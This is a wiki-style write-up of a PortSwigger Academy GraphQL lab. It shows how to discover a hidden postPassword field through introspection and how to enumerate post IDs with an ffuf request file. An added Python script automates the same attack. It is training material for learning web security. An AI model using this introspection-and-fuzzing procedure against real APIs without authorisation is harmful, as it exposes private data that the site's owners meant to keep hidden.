
GraphQL API vulnerabilities

Alnoman Kamil edited this page Nov 23, 2024 · 4 revisions

Apprentice lab:
Accessing private GraphQL posts

  • Solution

    1. View any post on the blog.
    2. Observe the POST request sent when a post is opened: the client does not fetch the page directly but queries a GraphQL endpoint (/graphql/v1) with a getBlogPost(id: $id) operation.
    3. Send a full introspection query to that endpoint. The query has to be wrapped in a JSON body ({"query": "..."}), so convert the introspection query text to a JSON string first (an online converter is enough).
    4. Paste the introspection response into a GraphQL visualizer to see the schema.
    5. Notice that the type returned by getBlogPost has a postPassword field that the normal client query never requests.
    6. Add postPassword to the getBlogPost query. For the public posts the response contains "postPassword":null, so the field is only populated for the hidden post.
    7. Fuzz the post id. The endpoint takes an integer id, so the candidate values are plain numbers (range.txt holds one id per line, e.g. 1 to 100) and FUZZ is left unquoted in the JSON body. -request replays the raw request below, -w supplies the ids, and -fr "null" drops every response whose body matches the regex null, so only a response with a real postPassword (or an error) is printed.
      ffuf -request request.txt -w range.txt -fr "null"
      request.txt
      POST https://uuid.web-security-academy.net/graphql/v1 HTTP/2.0
      user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
      accept: application/json
      accept-language: en-US,en;q=0.5
      accept-encoding: gzip, deflate, br, zstd
      referer: https://uuid.web-security-academy.net/post?postId=FUZZ
      content-type: application/json
      content-length: 285
      origin: https://uuid.web-security-academy.net
      cookie: session=3E9a6r6L5beUVP4B8Zn3WxYRbJM9ww67
      sec-fetch-dest: empty
      sec-fetch-mode: cors
      sec-fetch-site: same-origin
      priority: u=4
      te: trailers
      
      {
        "query": "\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n        postPassword\n}\n    }",
        "operationName": "getBlogPost",
        "variables": {
          "id": FUZZ
        }
      }
      
    8. Submit the postPassword value returned for the hidden post as the lab solution.
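The same procedure (introspect the schema, add the hidden field, enumerate ids and keep only responses where postPassword is not null) as a script, added here as an example rather than taken from the write-up. The endpoint path, the getBlogPost(id: Int!) operation and the postPassword field are the ones shown above; the introspection query is a narrowed standard __schema query; the type name BlogPost and the sample responses are constructed for the offline run and are not lab data.

```python
"""Added example: find the blog post whose postPassword is populated."""
import json
import sys
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

# Standard GraphQL introspection, narrowed to the query type. ofType is included
# because a NON_NULL return type (BlogPost!) wraps the real object type.
INTROSPECTION_QUERY = """
query { __schema { queryType { fields {
  name
  type { name fields { name } ofType { name fields { name } } }
} } } }
"""

# The client's query with postPassword added (step 6 of the write-up).
GET_POST_QUERY = """
query getBlogPost($id: Int!) {
  getBlogPost(id: $id) { title postPassword }
}
"""


def build_request(post_id: int) -> dict:
    """JSON body for one lookup. id is declared Int!, so it is sent as a number."""
    return {"query": GET_POST_QUERY, "operationName": "getBlogPost",
            "variables": {"id": post_id}}


def fields_of_query_return_type(introspection: dict, query_name: str) -> List[str]:
    """Field names of the object type returned by query_name (unwraps one NON_NULL/LIST level)."""
    for field in introspection["data"]["__schema"]["queryType"]["fields"]:
        if field["name"] != query_name:
            continue
        t = field["type"]
        while t and not t.get("fields") and t.get("ofType"):
            t = t["ofType"]
        return [f["name"] for f in (t.get("fields") or [])]
    return []


def extract_password(response: dict) -> Optional[str]:
    """None for public posts (postPassword: null), unknown ids, and error responses."""
    post = (response.get("data") or {}).get("getBlogPost")
    return post.get("postPassword") if post else None


def find_private_posts(fetch: Callable[[dict], dict],
                       ids: Iterable[int]) -> List[Tuple[int, str]]:
    """Equivalent of `ffuf ... -fr "null"`: keep ids whose postPassword has a value."""
    return [(i, pw) for i in ids
            if (pw := extract_password(fetch(build_request(i)))) is not None]


def http_fetch(endpoint: str, session: str) -> Callable[[dict], dict]:
    """Real transport: POST the JSON body with the lab session cookie."""
    def fetch(body: dict) -> dict:
        req = urllib.request.Request(
            endpoint, data=json.dumps(body).encode(),
            headers={"Content-Type": "application/json", "Cookie": f"session={session}"})
        with urllib.request.urlopen(req) as resp:
            return json.load(resp)
    return fetch


# Constructed sample responses for running offline; id 2 plays the hidden post.
SAMPLE_RESPONSES = {
    1: {"data": {"getBlogPost": {"title": "Public post", "postPassword": None}}},
    2: {"data": {"getBlogPost": {"title": "Hidden post", "postPassword": "s3cret"}}},
    3: {"data": {"getBlogPost": None}},  # unknown id
}


def sample_fetch(body: dict) -> dict:
    """Offline stand-in for http_fetch, answering from SAMPLE_RESPONSES."""
    return SAMPLE_RESPONSES.get(body["variables"]["id"],
                                {"errors": [{"message": "not found"}], "data": None})


if __name__ == "__main__":
    # usage: python find_post.py https://<lab-id>.web-security-academy.net/graphql/v1 <session>
    fetch = http_fetch(sys.argv[1], sys.argv[2]) if len(sys.argv) == 3 else sample_fetch
    if len(sys.argv) == 3:
        print("fields:", fields_of_query_return_type(fetch({"query": INTROSPECTION_QUERY}),
                                                     "getBlogPost"))
    for post_id, pw in find_private_posts(fetch, range(1, 101)):
        print(f"post {post_id}: postPassword={pw}")
```

Unlike the ffuf filter, which discards any body containing the literal `null` (including "post not found" responses), the script inspects the parsed postPassword value, so a response that is null elsewhere but carries a password would still be reported.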